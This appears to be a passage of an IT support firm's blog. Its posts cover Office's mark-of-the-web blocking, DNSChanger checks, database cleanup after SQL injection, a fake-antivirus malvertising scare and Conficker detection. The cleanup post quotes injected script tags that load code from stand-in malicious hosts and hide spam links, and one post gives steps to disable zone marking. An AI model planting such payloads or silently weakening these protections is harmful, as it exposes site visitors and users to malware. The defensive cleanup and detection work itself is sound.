Internet File Blocking on Server 2008 and Windows 7

We’ve got a client who recently upgraded their Windows Server 2008 Remote Desktop Services box from Office 2003 to Office 2010. In doing so, they ran up against Internet File Blocking, which Office 2010 enforces and Office 2003 simply ignored.

In a nutshell, any file you save from an “insecure” location, say an email attachment or a browser download, gets a Zone.Identifier alternate data stream written alongside it (the “mark of the web”) recording which security zone it came from. Office 2010 reads that mark, and when you try to open the file you get this helpful dialog:

[screenshot: Office 2010 error dialog on a blocked document]

File permissions are fine and disk space and memory are plentiful, so what’s the glitch? It’s the alternate data stream, a little-known NTFS feature that lets extra named streams of data be stored alongside a file’s main contents. In our case every downloaded file carries a Zone.Identifier stream holding the zone it came from (ZoneId=3 for the Internet zone), and Office 2010 hemorrhages with an unhelpful dialog when it finds one. Internet Explorer at least has the decency to tell you the score:

[screenshot: Internet Explorer security warning for the downloaded file]

So, the question is how does one open these files in Office?

One way is to right-click the file, open Properties, and on the General tab click the Unblock button, which deletes the Zone.Identifier stream:

[screenshot: file Properties dialog with the Unblock button]

But that can get tedious.

You can use Sysinternals’ streams.exe to strip the ADS from a whole tree of files at once (streams -s -d <folder> deletes every named stream under the folder, not only Zone.Identifier, so point it only at directories where that is what you want).

Or, you can turn the behavior off, which is what we did for our client.

A quick trip to the Google brought us to Dixin’s Blog (which is where we cribbed the “file properties” screenshot from) and the steps are laid out very clearly there.

In a nutshell, in Group Policy edit or create a policy that enables a single setting: User Configuration > Administrative Templates > Windows Components > Attachment Manager > “Do not preserve zone information in file attachments”. Two things to know before you do this. First, the setting only stops the mark being written for new downloads; files already on disk keep their Zone.Identifier stream until you unblock them or strip it. Second, it removes the signal that Office’s Protected View and the Attachment Manager itself rely on for every user the policy applies to, so on a box many people log into you are trading a safety net for convenience. (Under the hood it sets SaveZoneInformation=1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments, which is the value to check if you want to confirm the policy applied.)

Run gpupdate /force or log off and back on, and you’re good to go.

(We also enabled “Notify antivirus programs when opening attachments”, just to be on the safe side.)
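For the scripting-inclined, here is a small Python module, added for this post and not part of the original or of Dixin’s article, that shows what the Unblock button and streams.exe actually do: it parses the Zone.Identifier stream, decides whether the file would be treated as untrusted, and deletes the stream. Opening a named stream by appending “:Zone.Identifier” to the path only works on Windows/NTFS, so the parser is exercised on a constructed sample of the stream’s contents; the file path and URLs in the sample are made up.

```python
"""Inspect and strip the Zone.Identifier alternate data stream (the
"mark of the web") that Windows attaches to downloaded files.

Added example, not from the original post. On NTFS a named stream is
opened by appending ':<stream name>' to the path; that only works on
Windows, so the parser below is exercised on a constructed sample.
"""
import configparser
import os
from typing import Optional

# Zone numbers as used by Internet Explorer / Attachment Manager.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}

STREAM_SUFFIX = ":Zone.Identifier"

# Constructed sample of what IE/Outlook write into the stream for a file
# saved from the Internet zone (ZoneId=3). Newer Windows versions also
# record ReferrerUrl/HostUrl; older ones write only ZoneId.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://mail.example.invalid/\r\n"
    "HostUrl=https://mail.example.invalid/attachment/report.docx\r\n"
)


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style stream into zone id/name plus the optional URLs."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case as written (ZoneId, HostUrl, ...)
    cp.read_string(text)
    if not cp.has_section("ZoneTransfer"):
        raise ValueError("not a ZoneTransfer stream")
    sect = cp["ZoneTransfer"]
    zone_id = int(sect.get("ZoneId", "0"))
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
        "referrer": sect.get("ReferrerUrl"),
        "host": sect.get("HostUrl"),
    }


def is_blocked(text: str) -> bool:
    """Attachment Manager and Office treat zone 3 (Internet) and 4 (Restricted) as untrusted."""
    return parse_zone_identifier(text)["zone_id"] >= 3


def read_zone_identifier(path: str) -> Optional[str]:
    """Return the stream contents, or None if the file carries no mark (Windows/NTFS only)."""
    try:
        with open(path + STREAM_SUFFIX, "r", encoding="utf-8", errors="replace") as f:
            return f.read()
    except FileNotFoundError:
        return None


def unblock(path: str) -> bool:
    """Delete the stream: the same effect as Properties > Unblock or 'streams -d'.
    Returns True if a stream was removed, False if there was none."""
    try:
        os.remove(path + STREAM_SUFFIX)
        return True
    except FileNotFoundError:
        return False


if __name__ == "__main__":
    info = parse_zone_identifier(SAMPLE_STREAM)
    print(f"zone {info['zone_id']} ({info['zone_name']}), blocked={is_blocked(SAMPLE_STREAM)}")
```

Run on a Windows box, `read_zone_identifier(r"C:\Users\me\Downloads\report.docx")` shows you exactly what Office is reacting to, and `unblock()` on the same path is the per-file fix without touching the group policy.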

Anyway, you should really just go read Understanding the Internet File Blocking and Unblocking over at Dixin’s Blog; it’s much better than this one, with lots of screenshots and explanatory text in an easy-to-read manner.


DNSChanger – Will The Internet Break Tomorrow?

I’ve been asked by folks and have seen on FB about the “Internet shutting off” tomorrow — here’s my stock reply:

The malware that infected these machines is old; these aren’t new infections. It changed the computer’s DNS servers (and, on some home routers with default passwords, the router’s) to ones the bad guys controlled, which is like someone swapping your 411 operator for their own crooked operator: when you asked for Domino’s number, they’d give you Pizza Hut’s.

The bad guys’ servers were seized in November 2011 and replaced with clean ones run under a court order so infected machines kept working; that order runs out, and the FBI and the other law enforcement agencies involved have to turn the replacement servers off, tomorrow, July 9, 2012.

Google, Facebook and others can see when a visitor’s lookups are coming through those servers and have been putting up warnings for users whose machines still haven’t been cleaned, months after the fact.

So, if you haven’t seen a message from Google or Facebook, you’re almost certainly fine, nothing to see here. If you want to check for yourself, look at which DNS servers your computer (and your router) is configured to use and compare them with the published DNSChanger address ranges.
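The check described above, as an added Python example that is not part of the original post: it pulls the configured resolvers out of `ipconfig /all` on Windows (or /etc/resolv.conf elsewhere) and matches them against the six address ranges the FBI published for the seized DNSChanger resolvers. The post itself does not list those ranges; the ipconfig and resolv.conf excerpts below are constructed.

```python
"""Check the DNS servers a machine is configured to use against the
address ranges the DNSChanger (Rove Digital) resolvers lived in.

Added example, not part of the original post. The six ranges are the
ones the FBI published for the seized resolvers; the samples below are
constructed.
"""
import ipaddress
import platform
import re
import subprocess
from typing import Iterable, List

ROGUE_RANGES = [ipaddress.ip_network(n) for n in (
    "85.255.112.0/20",   # 85.255.112.0  - 85.255.127.255
    "67.210.0.0/20",     # 67.210.0.0    - 67.210.15.255
    "93.188.160.0/21",   # 93.188.160.0  - 93.188.167.255
    "77.67.83.0/24",     # 77.67.83.0    - 77.67.83.255
    "213.109.64.0/20",   # 213.109.64.0  - 213.109.79.255
    "64.28.176.0/20",    # 64.28.176.0   - 64.28.191.255
)]

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# Constructed 'ipconfig /all' excerpt for a box still pointing at the rogue resolvers.
SAMPLE_IPCONFIG = """\
Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : home.invalid
   IPv4 Address. . . . . . . . . . . : 192.168.1.20
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 85.255.112.36
                                       85.255.112.5
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

# Constructed /etc/resolv.conf with ordinary resolvers.
SAMPLE_RESOLV_CONF = "search home.invalid\nnameserver 192.168.1.1\nnameserver 8.8.8.8\n"


def is_rogue_resolver(addr: str) -> bool:
    """True if addr lies inside one of the DNSChanger ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in ROGUE_RANGES)


def find_rogue(resolvers: Iterable[str]) -> List[str]:
    """The subset of the given resolver addresses that are DNSChanger ones."""
    return [r for r in resolvers if is_rogue_resolver(r)]


def parse_resolv_conf(text: str) -> List[str]:
    """nameserver entries from resolv.conf-style text."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            out.append(parts[1])
    return out


def parse_ipconfig(text: str) -> List[str]:
    """DNS server addresses from 'ipconfig /all' output. Additional servers
    appear on indented continuation lines that carry no ' : ' field separator."""
    out: List[str] = []
    capturing = False
    for line in text.splitlines():
        if "DNS Servers" in line:
            capturing = True
            out += IPV4_RE.findall(line)
        elif capturing and " : " not in line:
            out += IPV4_RE.findall(line)
        else:
            capturing = False
    return out


def local_resolvers() -> List[str]:
    """Resolvers of the machine this runs on (ipconfig on Windows, resolv.conf elsewhere)."""
    if platform.system() == "Windows":
        text = subprocess.run(["ipconfig", "/all"], capture_output=True, text=True).stdout
        return parse_ipconfig(text)
    with open("/etc/resolv.conf", encoding="utf-8", errors="replace") as f:
        return parse_resolv_conf(f.read())


if __name__ == "__main__":
    bad = find_rogue(local_resolvers())
    print("DNSChanger resolvers found: " + (", ".join(bad) if bad else "none"))
```

If your PC points at the router (192.168.x.1 or similar) this only tells you the PC is clean; log into the router and check what it forwards to as well.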

Facebook posted a blog entry about their efforts.

Geek News Central said this about it:

The most interesting part of this story, of course, was not the DNSChanger bot itself but how the FBI and the court handled it. They could have shut it down immediately and the results would have been the same for those 300,000 plus 270,000 more. By delaying the shutdown they did allow those 270,000 to recover. However, it seems to me they dropped the ball in getting the word out. This didn’t become big news until the past week. I am not sure if the court and the FBI are to be blamed for this, or if it is the media’s fault for not getting the word out. Whoever’s fault it is, communication was lacking.


Cleaning Up After a SQL Injection Attack, Part 2

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., a Chicago-based web application development, networking, and graphic design firm, who found himself with a database full of malware injections. The characteristics of his attack didn’t match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren’t able to see how the site was attacked, nor were we asked to harden the site against a recurrence (always use stored procedures and/or parameterized queries, kids!); this was purely a cleanup job.

This is the code we had. It walks every user table and, for each character column, prints an UPDATE that REPLACEs the injected string with nothing: text, varchar and nvarchar columns in a first pass, and ntext columns, which REPLACE can’t take directly, in a second pass with a cast. You review the printed statements and then run them:

DECLARE @T VARCHAR(255), @C VARCHAR(255)

-- Pass 1: text (35), nvarchar (231) and varchar (167) columns of every user table.
-- Note: REPLACE rejects text arguments too, so text columns need the cast used in pass 2.
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u'
  AND (b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- The first string argument of REPLACE is the injected code to remove
    -- (left empty here; it was the <script> tag shown below).
    PRINT ('UPDATE [' + @T + '] SET [' + @C + '] = REPLACE([' + @C + '], '''', '''')')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

-- Pass 2: ntext (99) columns, cast to nvarchar(4000) for REPLACE and back to ntext.
-- Anything past 4000 characters is lost in that cast; nvarchar(max) avoids it on SQL 2005+.
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND b.xtype = 99
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    PRINT ('UPDATE [' + @T + '] SET [' + @C + '] = CAST(REPLACE(CAST([' + @C + '] AS nvarchar(4000)), '''', '''') AS ntext)')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

That worked fine, but it had a shortcoming: it only stripped out a single, fixed string, and our new friend had a lot more code to deal with. Instead of the almost quaint-looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

we had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden, an accomplished ColdFusion developer, suggested: “why don’t we just drop everything to the right of the <script> tag?”
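Branden’s rule, worked through in Python as an added example (not the post’s own code, which is cut off before its final T-SQL): strip_injected() applies “drop everything from the first <script> tag onwards” to one cell, handling NULLs, clean cells and a differently cased <SCRIPT>, and build_update() emits the equivalent T-SQL for one table/column so the same rule can be run server-side, including the cast that ntext needs. The sample rows are constructed; the table and column names are placeholders. Note the rule also drops any legitimate script a cell happened to contain after the injected one, which is the trade-off the cleanup accepted.

```python
"""Cleanup helper for the 'cut everything from the first <script> tag
onwards' approach. Added example, not the post's own code (the post is
truncated before its final T-SQL).
"""
import re

# Case-insensitive match on the tag every injection in the dump starts with.
INJECTION_START = re.compile(r"<script\b", re.IGNORECASE)

# Constructed sample cells: legitimate content followed by the injected payload,
# a clean cell, a cell hit twice with mixed case, and a NULL.
SAMPLE_ROWS = [
    ("<p>Welcome to our site.</p>"
     "<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>"
     "<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>"),
    "Plain description with no payload.",
    ("<p>Two injections</p><SCRIPT src='http://a.bad/x.js'></SCRIPT>"
     "<script src='http://b.bad/y.js'></script>"),
    None,
]


def strip_injected(value):
    """Return the cell with everything from the first <script> tag dropped.
    NULL and clean cells come back unchanged so callers can skip rewriting them."""
    if value is None:
        return None
    m = INJECTION_START.search(value)
    return value if m is None else value[:m.start()]


def clean_rows(rows):
    """Apply strip_injected() to every cell of one column."""
    return [strip_injected(v) for v in rows]


def quote_ident(name):
    """Bracket-quote a T-SQL identifier, doubling any ']' inside it."""
    return "[" + name.replace("]", "]]") + "]"


def build_update(table, column, is_ntext=False):
    """T-SQL applying the same rule to one column.

    CHARINDEX is case-insensitive under the usual CI collations; the WHERE
    clause leaves clean rows untouched, and the '- 1' stops short of the '<'.
    ntext supports neither LEFT nor CHARINDEX, so it is cast to nvarchar(max)
    and back (nvarchar(max), unlike nvarchar(4000), does not truncate)."""
    t, c = quote_ident(table), quote_ident(column)
    if is_ntext:
        src = f"CAST({c} AS nvarchar(max))"
        expr = f"CAST(LEFT({src}, CHARINDEX('<script', {src}) - 1) AS ntext)"
        cond = f"CHARINDEX('<script', {src}) > 0"
    else:
        expr = f"LEFT({c}, CHARINDEX('<script', {c}) - 1)"
        cond = f"CHARINDEX('<script', {c}) > 0"
    return f"UPDATE {t} SET {c} = {expr} WHERE {cond};"


if __name__ == "__main__":
    for before, after in zip(SAMPLE_ROWS, clean_rows(SAMPLE_ROWS)):
        print(repr(before)[:60], "->", repr(after))
    print(build_update("Products", "Description"))
    print(build_update("News", "Body", is_ntext=True))
```

The generated statements are what the cursor script above would PRINT if its REPLACE were swapped for the LEFT/CHARINDEX expression; back the database up before running them, since there is no undo for a truncation that cut in the wrong place.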
Continue reading Cleaning Up After a SQL Injection Attack, Part 2

Malware served from NY Times Website

I’ve gotten two calls from clients (OK, one was a client, the other my mother-in-law) saying they visited the NYTimes website and were attacked by malware.

This is true, they were. My MIL said she was trying to read Maureen Dowd and got hit with a rogue anti-spyware application. I was able to CoPilot in and clean things up. (There didn’t seem much to clean up; I killed a running IE process (she uses Chrome) and the scare-screen went away.)

I spun up an unpatched WinXP virtual machine running IE6, went to the NYT website, and was prompted immediately to install Flash. I opted not to and surfed around the site, fighting the information bar’s insistence that I install an ActiveX control.

So, I gave in and voila!

[screenshot: fake warning dialog from protection-check07.com]

So, no matter how you answer, you’re already stung.

Of course, your instinct is to click “Cancel”, and when you do you’re scared out of your wits by this page from protection-check07.com (don’t go there!), which proceeds to make you think you’re infected:

[screenshot: protection-check07.com fake scan page]

But, if we take a second to look at the scare box, we see something is amiss…

[screenshot: the fake scan listing a “Local Drive” E:]

We don’t have an E: drive… and the optical drive we have is a CD-ROM, not a DVD-RAM drive…

[screenshot: My Computer showing the VM’s actual drives]

The page that pops up is meant to scare you. The infections it reports are fake; the only thing on your machine at that moment is the web page itself. Open Task Manager, find iexplore.exe (or firefox.exe if you use Mozilla Firefox), right-click it and choose “End Process”; that makes the pop-up go away.

If you click ANYWHERE on the page, it will prompt you to download a program:

[screenshot: download prompt for Scanner-75f_2015.exe]

Seems reasonable: you got a warning that you were infected, and now you’re offered a file called “Scanner-75f_2015.exe”. Seems legit.

IT’S NOT.

(But you knew that by now, right?)

This is a clear picture of how even a patched system ends up compromised. Someone buys ad space on a major website. They probably serve a lot of legitimate ads, but in a few instances they serve malicious ones. Here they appear to be using Flash as the delivery vehicle: the Flash movie loads, redirects your browser to a rogue site, and the social engineering takes over from there. On a patched box nothing runs until you accept the download and launch it, which is exactly what the scare page is built to talk you into.

Since I’m a professional, I downloaded the file (I didn’t run it) and submitted it to http://virscan.org, an online scanner that tests a file against 37 of the leading anti-virus engines.

Somewhat sadly, only 5 out of 37 scanners picked this up as malware:

[screenshot: virscan.org results, 5 of 37 engines flagging the file]

I also ran the file through VirusTotal.com, which tests against 41 scanners, and 7 of them turned up a positive on our file:

[screenshot: VirusTotal.com results]

You can see the full report over on VirusTotal’s site: http://www.virustotal.com/analisis/7bda9187e26b5a185501874b201731f12e3604c078408500abda83c35ef2fbe1-1252857630

The one thing that surprised me on the results was Microsoft’s detection, trumping McAfee, Symantec, AVG and Clam-AV among many others. I’ve never considered MS a true player in the anti-malware landscape, but perhaps I will re-evaluate.

Kaspersky, and most other security vendors, offer an online scan of your system (requires Java). If you don’t have an anti-virus product installed, or even if you do, it’s worth running a check from a different vendor than the one you already use. Belt and suspenders and all that.

(This piece of spyware also eluded my trusty Malwarebytes Anti-Malware (www.malwarebytes.org), which should reinforce that no one piece of software can provide 100% protection.)

There is no single strong defense for this, since nothing you overtly do triggers it. Keep your browser and its plugins (Flash especially) patched, don’t browse as an administrator, keep your anti-virus up to date and scan regularly, but MOST importantly keep backups.

As for the clients, one of them uses Norton GoBack (since superseded in the marketplace by Ghost 14), so they restored their machine to an hour before the infection occurred, went back to the NY Times site, got re-infected, restored AGAIN using GoBack, and then stayed away from the NY Times site. And my mother-in-law has been trained well: as soon as the box popped up she called me, and I was able to CoPilot into her machine and close IE before it did any damage… may you all be as lucky.

Further Info:

http://ask.metafilter.com/132707/nytimes-spyware

http://discussions.apple.com/thread.jspa?messageID=10197120&tstart=0

http://forums.mozillazine.org/viewtopic.php?f=38&t=1481195

[UPDATE: 1:30 PM, Sunday Sept 13 – the NY Times site seems to have stopped serving the ad. Further attempts to get infected have proven unsuccessful.]

Conficker Eye Chart

If you’re worried about this <scary voice>virus of doom</scary voice> that everyone’s gone mental over, you might want to pop over to The Conficker Eye Chart that the Conficker Working Group has put together.

Basically, the eye chart is a page that loads images from security-vendor sites that Conficker actively blocks (it hooks DNS resolution and fails any lookup for a name containing those vendors’ strings). So, if you can see all the images, you’re not infected. Pretty clever.
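A miniature version of the same idea in Python, added here and not the Working Group’s own page: fetch one small image from each of several security-vendor sites plus a couple of control images from unrelated sites, then classify. The control images are what separate “no network at all” from “only security sites are unreachable”, which is the Conficker signature. The URLs are placeholders to swap for real image URLs, and the fetcher is pluggable so the classification can be exercised offline with canned results.

```python
"""Miniature Conficker eye chart: fetch images from security-vendor sites
the worm blocks, plus control images from unrelated sites, and classify.

Added example, not the Conficker Working Group's page. The URLs below are
placeholders (constructed); replace them with real image URLs to use it.
"""
import urllib.request
from typing import Callable, Dict, Sequence

# Placeholder lists. The real chart used vendor logos such as Symantec's
# and McAfee's, whose names Conficker's DNS hook refuses to resolve.
VENDOR_IMAGES = [
    "http://av-vendor-a.invalid/logo.gif",
    "http://av-vendor-b.invalid/logo.gif",
    "http://av-vendor-c.invalid/logo.gif",
]
CONTROL_IMAGES = [
    "http://unrelated-site-a.invalid/logo.gif",
    "http://unrelated-site-b.invalid/logo.gif",
]

Fetcher = Callable[[str], bool]


def http_fetch(url: str, timeout: float = 5.0) -> bool:
    """True if the image downloads (2xx). DNS failure, connection failure and
    HTTP errors all count as 'did not load', which is what a hooked lookup
    looks like from the outside."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return 200 <= resp.status < 300
    except Exception:
        return False


def run_chart(vendor_urls: Sequence[str], control_urls: Sequence[str],
              fetch: Fetcher = http_fetch) -> Dict[str, bool]:
    """Fetch every image once and record whether it loaded."""
    return {u: fetch(u) for u in list(vendor_urls) + list(control_urls)}


def classify(results: Dict[str, bool], vendor_urls: Sequence[str],
             control_urls: Sequence[str]) -> str:
    """Turn per-image results into a verdict."""
    vendor_ok = [results[u] for u in vendor_urls]
    control_ok = [results[u] for u in control_urls]
    if not any(control_ok):
        return "no connectivity: nothing loaded, so the chart cannot tell"
    if all(vendor_ok):
        return "clean: every vendor image loaded"
    if not any(vendor_ok):
        return "suspicious: vendor sites blocked while other sites load (Conficker-like)"
    return "partial: some vendor sites blocked; rule out a proxy or web filter first"


def eye_chart(vendor_urls: Sequence[str] = VENDOR_IMAGES,
              control_urls: Sequence[str] = CONTROL_IMAGES,
              fetch: Fetcher = http_fetch) -> str:
    return classify(run_chart(vendor_urls, control_urls, fetch), vendor_urls, control_urls)


if __name__ == "__main__":
    print(eye_chart())
```

The “partial” verdict matters in a corporate network: a web filter that blocks downloads from some vendors produces the same picture as the worm, so confirm with a direct nslookup of one of the vendor names before declaring an infection.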

If you are infected, you might want to drop us a line.